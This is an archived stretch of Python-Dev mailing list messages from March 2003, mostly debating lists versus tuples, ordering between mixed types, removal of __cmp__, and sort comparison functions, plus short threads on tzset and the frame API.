Date: Sat, 15 Mar 2003 20:50:33 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <200303151907.35471.aleax@aleax.it>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303150857.53214.aleax@aleax.it> <3E734DD7.3080105@tismer.com> <200303151907.35471.aleax@aleax.it>
Message-ID: <3E738409.4060500@tismer.com>

Alex Martelli wrote:
...

> A list containing ONE complex number and (e.g.) three
> strings is sortable.  So, there are NO "non-sortable things".

Quite an academical POV for a practical man like you.

> A list is non-sortable (unless by providing a custom compare,
> as you pointed out) if it contains a complex number and any
> other number -- so, there _are_ "non-sortable LISTS" (unless
> suitable custom compares are used), but still no "non-sortable
> THINGS" in current Python.

Don't understand: How is a tuple not a non-sortable
thing, unless I turn it into a list, which is not
a tuple? Or do you mean the complex, which refuses
to be sorted, unlike other obejcts, which don't
provide any ordering, and are ordered by ID?

[number/string comparison]

> Such a change would indeed enormously increase the
> number of non-sortable (except by providing custom
> compares) lists.

Theoretical lists, or those existing in real
applications? For the latter, most of the time,
mixing ints and strings was most often a programming
error in my past.

> So, for example, all places which get
> and sort the list of keys in a dictionary in order to return 
> or display the keys should presumably do the sorting
> within a try/except?  Or do you think a dictionary should
> also be constrained to have keys that are all comparable
> with each other (i.e., presumably, never both string AND
> number keys) as well as hashable?

I would like to have sub-classes of dictionaries, which
protect me from putting key into them which I didn't
intend to. But that doesn't mean that I want to
forbid it once and forever.
Concerning general dicts, you are right, sorting the keys
makes sense to get them into some arbitrary order.

> I fail to see how forbidding me to sort the list of keys of
> any arbitrary dict will enhance my productivity in any way --

I thought it would catch the cases where you failed to build
a key of the intended type. Maybe this is worse than what we
have now, tho. I have to say that this wasn't the point of my
message, so I don't care to discuss it.

...

> Since when is Python about forbidding the user to do
> quite normal things such as sorting the list of keys of
> any arbitrary dictionary for more elegant display -- for
> no practically useful purpose that I've ever seen offered,
> in brisk violation of "practicality beats purity"?

Well, I just don't like such an arbitrary thing, that a
string is always bigger than an int. Since we don't allow
them to use as each other by coercion, we also should not
compare them. Bean counts are bean counts, and names are names.
One could go the AWK way, where ints and strings were concerted
whenever necessaray, but that would be even worse.
Maybe the way Python handles it is not so bad. But then it
sould be consequent and at least move complex objects
into their own group in the sorted array, maybe just not
sorting themselves.

Anyway, this would also not increase your/my productivity
in any way, so let's get back to real problems.

ciao - chris
-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From guido@python.org  Sat Mar 15 22:45:34 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 15 Mar 2003 17:45:34 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: "Your message of Sat, 15 Mar 2003 12:54:05 EST."
 <b4vp23$vec$1@main.gmane.org>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
 <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
 <b4vp23$vec$1@main.gmane.org>
Message-ID: <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>

[Terry Reedy]
> For user-defined types/classes, I presume that this would still mean
> deferring to the appropriate magic method (__cmp__ or __ge__?) to
> define 'meaningful'.

Yes.  And I'm still hoping to remove __cmp__; there should be only one
way to overload comparisons.

> > I'd like to to this in Python 3.0, but that probably means we'd have
> > to start deprecating default comparisons except (in)equality in
> Python
> > 2.4.
> 
> +1, I think.
> 
> Based on reading cl.py, the validity of nonsense comparisons is one of
> the more surprising 'features' of Python for beginners -- who
> reasonably expect a TypeError or ValueError.  Once they get past that,
> they are then surprised by the unstability across versions.  Given
> that universal sorting of hetero-lists is now broken, I think it would
> be better to do away with it cleanly.  It is seldom needed and would
> still be available with a user-defined sorting function (which
> requires some thought as to what is really wanted).

Exactly.

> A Python version of the present algorithm could be included (in
> Tools/xx perhaps) for anyone who actually needs it.

I doubt there will be many takers.  Let people make up their own
version, so they know its behavior.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sat Mar 15 22:43:10 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 15 Mar 2003 17:43:10 -0500
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: "Your message of Sat, 15 Mar 2003 19:07:35 +0100."
 <200303151907.35471.aleax@aleax.it>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303150857.53214.aleax@aleax.it> <3E734DD7.3080105@tismer.com>
 <200303151907.35471.aleax@aleax.it>
Message-ID: <200303152243.h2FMhA706558@pcp02138704pcs.reston01.va.comcast.net>

[Christian Tismer]
> > that people are putting widely different types into
> > a list in order to sort them. (Although there is an
> > arbitrary order between strings and numbers, which
> > I would drop in Python 2.4, too).

[Alex Martelli]
> Such a change would indeed enormously increase the
> number of non-sortable (except by providing custom
> compares) lists.  So, for example, all places which get
> and sort the list of keys in a dictionary in order to return 
> or display the keys should presumably do the sorting
> within a try/except?

I don't believe this argument.  I've indeed often sorted a dict's keys
(or values), but always in situations where the sorted values were
homogeneous as far meaningful comparison goes, e.g. all numbers, or
all strings, or all "compatible" tuples.

> Or do you think a dictionary should also be constrained to have keys
> that are all comparable with each other (i.e., presumably, never
> both string AND number keys) as well as hashable?

If you know *nothing* about the keys of a dict, you already have to do
that if you want to sort the keys.

There are lots of apps that have no need to ever sort the keys: if
there weren't, it would have been wiser to keep the keys in sorted
order in the first place, like ABC did.

> I fail to see how forbidding me to sort the list of keys of
> any arbitrary dict will enhance my productivity in any way --
> it's bad enough (in theory -- in practice it doesn't bite much
> as complex numbers are used so rarely) with the complex
> numbers thingy, why make it even worse by inventing a
> novel "strings vs numbers" split?

To the contrary, I don't see how it will reduce your productivity.

You seem to be focusing on the wrong thing (sorting dict keys).  The
right thing to consider here is that "a < b" should only work if a and
b can be meaningfully ordered, just like "a + b" only works if a and b
can be meaningfully added.

> Since when is Python about forbidding the user to do
> quite normal things such as sorting the list of keys of
> any arbitrary dictionary for more elegant display -- for
> no practically useful purpose that I've ever seen offered,
> in brisk violation of "practicality beats purity"?

I doubt that elegant display of a dictionary with wildly incompatible
keys is high on anybody's list of use cases.  On the other hand, I'm
sure that raising an exception on abominations like 2 < "1" or
(1, 2) < 0 is a good thing, just like we all agree that forbidding
1 + "2" is a good thing.

Of course, == and != will continue to accept objects of incongruous
types -- these will simply be considered inequal.  That's the
cornerstone of dictionaries, and I see no reason to change this --
while I don't know whether 1 ought to be considered less than or
greater than 1j, I damn well know they aren't equal!

(And I'm specifically excluding gray areas like comparing tuples and
lists.  Given that (a, b) = [1, 2] now works, as does [].extend(()),
it might be better to allow comparing tuples to lists, and even
consider them equal if they have the same length and their items
compare equal pairwise.  This despite my position about the different
idiomatic uses of the two types.  And so the circle closes [see
Subject]. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From ark@research.att.com  Sat Mar 15 23:44:36 2003
From: ark@research.att.com (Andrew Koenig)
Date: 15 Mar 2003 18:44:36 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
 <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
 <b4vp23$vec$1@main.gmane.org>
 <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <yu99adfw5h5n.fsf@europa.research.att.com>

Guido> Yes.  And I'm still hoping to remove __cmp__; there should be
Guido> only one way to overload comparisons.

Moreover, for some data structures, the __cmp__ approach can be
expensive.  For example, if you're comparing sequences of any kind,
and you know that the comparison is for == or !=, you have your answer
immediately if the sequences differ in length.  If you don't know
what's being tested, as you wouldn't inside __cmp__, you may spend a
lot more time to obtain a result that will be thrown away.

-- 
Andrew Koenig, ark@research.att.com, http://www.research.att.com/info/ark


From glyph@twistedmatrix.com  Sun Mar 16 04:19:30 2003
From: glyph@twistedmatrix.com (Glyph Lefkowitz)
Date: Sat, 15 Mar 2003 22:19:30 -0600
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <20030315063502.17965.57753.Mailman@mail.python.org>
Message-ID: <7BFB4526-5766-11D7-806A-000393C9700E@twistedmatrix.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Saturday, March 15, 2003, at 12:35 AM, python-dev-request@python.org 
wrote:

> Then I realize that C++ has exactly this feature (it's called "const"),
> and that I find it to be an annoyance far more often than I find it
> handy. And I begin to question.

I have thought about this as well; I think that the problem is that in 
C++, you have to declare "const" *everywhere* -- you can't just pass a 
mutable data structure and have the "right thing" happen the way it 
most obviously should.  Arguably when one is mucking about at such a 
low level as is common in C++, this is something that you have to be 
really careful about, but I still think that it's handled badly in the 
syntax.

Imagine for a moment that dictionaries and lists in Python had a 
"const" method which would immutabilify them (if that's even a word).  
The following example:

>> const char* strrev(const char* torev) {
>> 	// reverse the string
>> }
>> ...
>> 	char* x = "1234";
>> 	char* y = (char*) strrev((const char*)x); // tell me I've been bad, 
>> g++!
>> ...

As opposed to:

>> def strrev(s):
>>     "Please pass me immutable data!"
>>     # reverse the string
>> ...
>> 	x = '1234'
>> 	y = strrev(x.const()).copy()
>> ...

I think that the latter is far less likely to annoy.  Of course, in 
this hypothetical example, I can design all kinds of convenient 
behavior for these Python mutability operations to have, like 'copy' 
always returning a mutable shallow copy of the data structure in 
question, and '.const()' making an object immutable and then returning 
'self'...

This smells like another unformed PEP I don't have the time to think 
about or implement :-(, but I would definitely like to see mutability 
guarantees worm their way into the language at some point, too.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (Darwin)

iD8DBQE+c/tWvVGR4uSOE2wRAmeoAJ9tSOYOKTCxcl6Aj6reelmFU8OafwCggcNY
smKTK1+HRCCEC9Pl/mhE4cI=
=cMYA
-----END PGP SIGNATURE-----


From tim.one@comcast.net  Sun Mar 16 04:36:28 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 15 Mar 2003 23:36:28 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEECEBAB.tim.one@comcast.net>

[Guido]
> Yes.  And I'm still hoping to remove __cmp__; there should be only one
> way to overload comparisons.

As long as we're going to break everyone's code, list.sort(f) should also be
redefined then so that f returns a Boolean, f(a, b) meaning a is less than
b.  list.sort()'s implementation uses only less-than already, and it seems
that all newcomers to Python who didn't come by way of C or Perl (same thing
in this respect <wink>) expect sort's comparison function to work that way.


From tim.one@comcast.net  Sun Mar 16 05:07:47 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 16 Mar 2003 00:07:47 -0500
Subject: [Python-Dev] tzset
In-Reply-To: <Pine.SOL.4.53.0303142237290.4751@death.OCF.Berkeley.EDU>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEEDEBAB.tim.one@comcast.net>

[Brett Cannon]
> If there is one thing I have learned from writing _strptime is that you
> cannot be strict in the slightest for your input when it comes to
> time-based data.  I think this is another case where you need to be loose
> about input and strict with output.

Python doesn't do anything with TZ's value -- it doesn't even look to see
whether TZ is set, let alone parse it (well, Python's obsolete tzparse
module parses TZ's value, but the new code in question does not).

The cross-platform semantics of TZ are a joke.  The tests we have rely on
non-standard extensions (viewing POSIX as the only definitive std here).
Even if they stuffed colons at the front, POSIX leaves the interpretation of
colon-initiated TZ values entirely up to the implementation:

    If TZ is of the first format (that is, if the first character is a
    colon), the characters following the colon are handled in an
    implementation-defined manner.

Worse, if the platform tzset() isn't happy with TZ's value, it has no way to
tell you:  the function is declared void, and has no defined effects on
errno.

I hope the community takes up the challenge of building a sane
cross-platform time zone facility building on 2.3 datetime's tzinfo objects.


From tim.one@comcast.net  Sun Mar 16 05:28:04 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 16 Mar 2003 00:28:04 -0500
Subject: [Python-Dev] tzset
In-Reply-To: <2ADB787D-56B0-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEFEBAB.tim.one@comcast.net>

[Stuart Bishop]
> ...
> To me, this is the useful format as all the others require you to
> know your DST transition times rather rely of the OS to supply them.

But since there are no defined names in POSIX, supplying transition rules
explicitly via the second POSIX format is the only way that has a shot at
being portable.

> At the moment if the 'path to a tzfile(5)' format is not accepted, your
> tzset(3) is considered broken and time.tzset not built.

I'll let the Unix weenies straighten out their own mess here <wink>.

> I'm happy to rewrite the detection in configure.in and the test in
> test_time.py to lower the bar on this, but I think a better solution
> may be to determine if Windows has a format that lets us to DST
> calculations and keep the bar high.

I couldn't parse that, but I've got no interest in exposing the Windows
version of tzset() to Python users regardless (it's a lame effort to mimic
part of the Unixish TZ gimmicks; the Win32 API has a richer way to deal with
time zones, which doesn't use environment variables).


From arigo@tunes.org  Sun Mar 16 07:33:03 2003
From: arigo@tunes.org (Armin Rigo)
Date: Sat, 15 Mar 2003 23:33:03 -0800 (PST)
Subject: [Python-Dev] PyEval_GetFrame() revisited
In-Reply-To: <3E7219D1.6090306@tismer.com>; from tismer@tismer.com on Fri, Mar 14, 2003 at 07:05:05PM +0100
References: <3E7204EC.60506@tismer.com> <3E7219D1.6090306@tismer.com>
Message-ID: <20030316073303.31B3E5147@bespin.org>

Hello Christian,

On Fri, Mar 14, 2003 at 07:05:05PM +0100, Christian Tismer wrote:
> > where the PyEval_GetGLobals is used instead of
> >               tstate->frame->f_globals
> Ah!!
> Can it be that PyEval_GetFrame() is just indended
> to signal to an extension like Psyco that it needs
> to quickly invent a frame now?

Yes, indeed.  This was a very limited hack so that the frame would get the
correct locals even in the presence of Psyco.  Now I realize that it may have
been pointless anyway, if this dummy frame is never really used but for
tracebacks.

Maybe an API to manipulate tstate->frame could be useful and really
lightweight.  Alternatively, we could consider what pyexpat does as a general
pattern and have an API for it, e.g.:

PyFrame_Push(PyFrameObject* f) ->
    pushes 'f' on the frame stack, assert()ing that f->f_back is tstate->frame
    or pushes a new placeholder frame if 'f' is NULL.
    This also calls the profile and trace hooks.

PyFrame_Pop() ->
    pops the frame, calling profile and trace hooks,
    and recording a traceback if PyErr_Occurred().

and maybe a PyFrame_FromC() function that creates a placeholder with
controllable parameters as in pyexpat.c:getcode().


A bient�t,

Armin.


From guido@python.org  Sun Mar 16 12:32:04 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 16 Mar 2003 07:32:04 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: "Your message of 15 Mar 2003 18:44:36 EST."
 <yu99adfw5h5n.fsf@europa.research.att.com>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
 <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
 <b4vp23$vec$1@main.gmane.org>
 <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
 <yu99adfw5h5n.fsf@europa.research.att.com>
Message-ID: <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net>

> Guido> Yes.  And I'm still hoping to remove __cmp__; there should be
> Guido> only one way to overload comparisons.
> 
> Moreover, for some data structures, the __cmp__ approach can be
> expensive.  For example, if you're comparing sequences of any kind,
> and you know that the comparison is for == or !=, you have your answer
> immediately if the sequences differ in length.  If you don't know
> what's being tested, as you wouldn't inside __cmp__, you may spend a
> lot more time to obtain a result that will be thrown away.

Yes.  OTOH, as long as cmp() is in the language, these same situations
are more efficiently done by a __cmp__ implementation than by calling
__lt__ and then __eq__ or similar (it's hard to decide which order is
best).  So cmp() should be removed at the same time as __cmp__.

And then we should also change list.sort(), as Tim points out.  Maybe
we can start introducing this earlier by using keyword arguments:

  list.sort(lt=function)     sorts using a < implementation
  list.sort(cmp=function)    sorts using a __cmp__ implementation

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun Mar 16 13:06:02 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 16 Mar 2003 08:06:02 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: "Your message of Sun, 16 Mar 2003 07:32:04 EST."
 <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
 <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
 <b4vp23$vec$1@main.gmane.org>
 <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
 <yu99adfw5h5n.fsf@europa.research.att.com>
 <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net>

> > Guido> Yes.  And I'm still hoping to remove __cmp__; there should be
> > Guido> only one way to overload comparisons.

[Andrew]
> > Moreover, for some data structures, the __cmp__ approach can be
> > expensive.  For example, if you're comparing sequences of any kind,
> > and you know that the comparison is for == or !=, you have your answer
> > immediately if the sequences differ in length.  If you don't know
> > what's being tested, as you wouldn't inside __cmp__, you may spend a
> > lot more time to obtain a result that will be thrown away.

[Guido]
> Yes.  OTOH, as long as cmp() is in the language, these same situations
> are more efficiently done by a __cmp__ implementation than by calling
> __lt__ and then __eq__ or similar (it's hard to decide which order is
> best).  So cmp() should be removed at the same time as __cmp__.

I realized the first sentence wasn't very clear.  I meant that
implementing cmp() is inefficient without __cmp__ for some types
(especially container types).  Example:

 cmp(range(1000)+[1], range(1000)+[0])

If the list type implements __cmp__, each of the pairs of items is
compared once.  OTOH, if the list type only implemented __lt__, __eq__
and __gt__, cmp() presumably would have to try one of those first, and
then another one.  If it picked __lt__ followed by __eq__, it would
get two False results in a row, meaning it could return 1 (cmp()
doesn't really expect incomparable results :-), but at the cost of
comparing each pair of items twice.  If cmp() picked another set of
two operators to try, I'd simply adjust the example.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz@pythoncraft.com  Sun Mar 16 15:37:14 2003
From: aahz@pythoncraft.com (Aahz)
Date: Sun, 16 Mar 2003 10:37:14 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com> <200303150857.53214.aleax@aleax.it> <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net> <b4vp23$vec$1@main.gmane.org> <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net> <yu99adfw5h5n.fsf@europa.research.att.com> <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net> <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030316153714.GA17944@panix.com>

On Sun, Mar 16, 2003, Guido van Rossum wrote:
>
> I realized the first sentence wasn't very clear.  I meant that
> implementing cmp() is inefficient without __cmp__ for some types
> (especially container types).  Example:
> 
>  cmp(range(1000)+[1], range(1000)+[0])
> 
> If the list type implements __cmp__, each of the pairs of items is
> compared once.  OTOH, if the list type only implemented __lt__, __eq__
> and __gt__, cmp() presumably would have to try one of those first, and
> then another one.  If it picked __lt__ followed by __eq__, it would
> get two False results in a row, meaning it could return 1 (cmp()
> doesn't really expect incomparable results :-), but at the cost of
> comparing each pair of items twice.  If cmp() picked another set of
> two operators to try, I'd simply adjust the example.

That's something I've been thinking about.  I use cmp() for that purpose
in the BCD module, because I do need the 3-way result (and it appears
that Eric kept that).  OTOH, it's certainly easy enough to define a
cmp() function, and not having the builtin wouldn't kill performance.
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

Register for PyCon now!  http://www.python.org/pycon/reg.html


From ark@research.att.com  Sun Mar 16 16:02:13 2003
From: ark@research.att.com (Andrew Koenig)
Date: Sun, 16 Mar 2003 11:02:13 -0500 (EST)
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net>
 (message from Guido van Rossum on Sun, 16 Mar 2003 08:06:02 -0500)
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
 <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
 <b4vp23$vec$1@main.gmane.org>
 <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
 <yu99adfw5h5n.fsf@europa.research.att.com>
 <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net> <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303161602.h2GG2DO00056@europa.research.att.com>

Guido> I realized the first sentence wasn't very clear.  I meant that
Guido> implementing cmp() is inefficient without __cmp__ for some types
Guido> (especially container types).  Example:

Guido>  cmp(range(1000)+[1], range(1000)+[0])

Guido> If the list type implements __cmp__, each of the pairs of items
Guido> is compared once.  OTOH, if the list type only implemented
Guido> __lt__, __eq__ and __gt__, cmp() presumably would have to try
Guido> one of those first, and then another one.  If it picked __lt__
Guido> followed by __eq__, it would get two False results in a row,
Guido> meaning it could return 1 (cmp() doesn't really expect
Guido> incomparable results :-), but at the cost of comparing each
Guido> pair of items twice.  If cmp() picked another set of two
Guido> operators to try, I'd simply adjust the example.

Yes.  If you want to present a 3-way comparison to users, an
underlying 3-way comparison is the fastest way to do it.  The trouble
is that a 3-way comparison is definitely not the fastest way to
present a 2-way comparison to users.

So if you want users to see separate 2-way and 3-way comparisons,
I think the fastest way to implement them is not to try to force
commonality where none exists.


From ark@research.att.com  Sun Mar 16 18:59:30 2003
From: ark@research.att.com (Andrew Koenig)
Date: 16 Mar 2003 13:59:30 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEECEBAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCOEECEBAB.tim.one@comcast.net>
Message-ID: <yu993clnjfxp.fsf@europa.research.att.com>

Tim> [Guido]
>> Yes.  And I'm still hoping to remove __cmp__; there should be only one
>> way to overload comparisons.

Tim> As long as we're going to break everyone's code, list.sort(f)
Tim> should also be redefined then so that f returns a Boolean, f(a,
Tim> b) meaning a is less than b.

I don't think it's necessary to break code in order to accommodate
that change, as long as you're willing to tolerate one extra
comparison per call to sort, plus a small amount of additional
overhead.

As I understand it, the problem is to distinguish between a function
that returns negative, zero, or positive, depending on the result of
the comparison, and a function that returns true or false.  So if we
had a way to determine efficiently which kind of function the user
supplied, we could maintain compatibility.

Imagine, then, that we have a function f, and we want to figure out
which kind of function it is.  Assume, furthermore, that the only kind
of commparisons we want to perform is to determine whether a < b for
various values of a and b.

Note first that whenever f(a, b) returns 0, we don't care which kind
of function f is, because a < b will be false in either case.  So we
allow our sort algorithm to run until the first time a call to f(a, b)
returns a nonzero value.

Now we can determine what kind of function f is by calling f(b, a).
If f(b, a) is zero, then f is a boolean predicate.  If f(b, a) is
nonzero, then f returns negative/zero/positive -- and, incidentally,
f(b, a) had better have the opposite sign from f(a, b).

I understand that there is some overhead involved in storing the
information about which kind of comparison it is, and testing it on
each comparison.  I suspect, however, that that overhead can be made
small compared to the overhead involved in calling the comparison
function itself.


-- 
Andrew Koenig, ark@research.att.com, http://www.research.att.com/info/ark


From thomas@xs4all.net  Sun Mar 16 19:42:00 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Sun, 16 Mar 2003 20:42:00 +0100
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com> <200303150857.53214.aleax@aleax.it> <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net> <b4vp23$vec$1@main.gmane.org> <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net> <yu99adfw5h5n.fsf@europa.research.att.com> <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030316194200.GO2112@xs4all.nl>

On Sun, Mar 16, 2003 at 07:32:04AM -0500, Guido van Rossum wrote:

> > Guido> Yes.  And I'm still hoping to remove __cmp__; there should be
> > Guido> only one way to overload comparisons.

[ Andrew Koenig ]
> > Moreover, for some data structures, the __cmp__ approach can be
> > expensive.  For example, if you're comparing sequences of any kind,
> > and you know that the comparison is for == or !=, you have your answer
> > immediately if the sequences differ in length.  If you don't know
> > what's being tested, as you wouldn't inside __cmp__, you may spend a
> > lot more time to obtain a result that will be thrown away.

> Yes.  OTOH, as long as cmp() is in the language, these same situations
> are more efficiently done by a __cmp__ implementation than by calling
> __lt__ and then __eq__ or similar (it's hard to decide which order is
> best).  So cmp() should be removed at the same time as __cmp__.

I'm confused, as well as conflicted. I know I'm not well educated in
language design or mathematics, and I realize that comparisons between types
don't always make *mathematical* sense, but to go from there to removing
type-agnostic (not the right term, but bear with me) list-sorting and
three-way comparison altogether is really a big jump, and one I really don't
agree with. I find being able to sort (true) heterogeneous lists in a
consistent if not 'purely' sensible manner to be quit useful at times, and
all other times I already know I have a homogeneous list and don't care
about it. It's a practical approach because I don't have to think about how
it's going to be sorted, I don't have to take every edgecase into account,
and I don't have to know in advance what my list is going to contain (or
update all calls to 'sort' when I find I have to find a conflicting type to
the list.) I do not see how this is harmful; the cases I've seen where
people bump into this the hard way (e.g. doing "0" < 1) were fundamental
misunderstandings that would be corrected in a dozen other ways. Allowing
'senseless' comparisons does not strike me as a major source of confusion or
bad code.

I was uneasy about the change in complex number comparison, but I didn't
mind that, then, because it is a very rarely used feature to start with and
when looking at it from a 'unified number' point of view, it makes perfect
sense. But the latter does not apply to most other types, and I don't
believe it should. My defensive programming nature (I write Perl for a
living, if I wasn't defensive by nature I'd have committed suicide by now)
would probably make me always use a 'useful sorter' function, possibly by
using subclasses of list (so I could guard against other subtle changes,
too, by changing one utility library, tw.Tools. Yuck.) I really don't like
how that affects the readability of the code. I'd feel better about
disallowing '==' for floating point numbers, as I can see why that is a
problem. But I don't feel good about that either ;)

I really like how most Python objects are convenient. Lists grow when you
need them to, slices do what you think they do, dicts can take any
(hashable) object as a key (boy, do I miss that in Perl), mathematical
operations work with simple operators even between types, objects,
instances, classes and modules all behave consistently and have consistent
syntax. Yes, Python has some odd quirks, some of which require a comment or
two when writing code that will be read by people with little or no Python
knowledge (e.g. my colleagues.) But I believe adding a small comment like
"'global' is necessary to *assign* to variables in the module namespace" or
"'%(var)s' is how we say '$var'" or "'x and y or s' is like 'x ? y : s' if y
is true, which it always is here" or any of the half-dozen other things I
can imagine, not counting oddities in standard modules, is preferable over
forcing the syntax or restricting the usage to try and 'solve' the quirks.

> And then we should also change list.sort(), as Tim points out.  Maybe
> we can start introducing this earlier by using keyword arguments:

>   list.sort(lt=function)     sorts using a < implementation
>   list.sort(cmp=function)    sorts using a __cmp__ implementation

Perhaps we need stricter prototypes, that define the returnvalue. Or
properties on (or classes of) functions, so we can tell whether a function
implements the lessthan interface, or the threeway one. It would definately
*look* better than the above ;)

Practically-beats-this-idea-in-my-eyes'ly y'rs ;)
-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From guido@python.org  Sun Mar 16 20:34:17 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 16 Mar 2003 15:34:17 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: "Your message of Sun, 16 Mar 2003 11:02:13 EST."
 <200303161602.h2GG2DO00056@europa.research.att.com>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
 <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
 <b4vp23$vec$1@main.gmane.org>
 <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
 <yu99adfw5h5n.fsf@europa.research.att.com>
 <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net>
 <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net>
 <200303161602.h2GG2DO00056@europa.research.att.com>
Message-ID: <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net>

> Guido> I realized the first sentence wasn't very clear.  I meant that
> Guido> implementing cmp() is inefficient without __cmp__ for some types
> Guido> (especially container types).  Example:
> 
> Guido>  cmp(range(1000)+[1], range(1000)+[0])
> 
> Guido> If the list type implements __cmp__, each of the pairs of items
> Guido> is compared once.  OTOH, if the list type only implemented
> Guido> __lt__, __eq__ and __gt__, cmp() presumably would have to try
> Guido> one of those first, and then another one.  If it picked __lt__
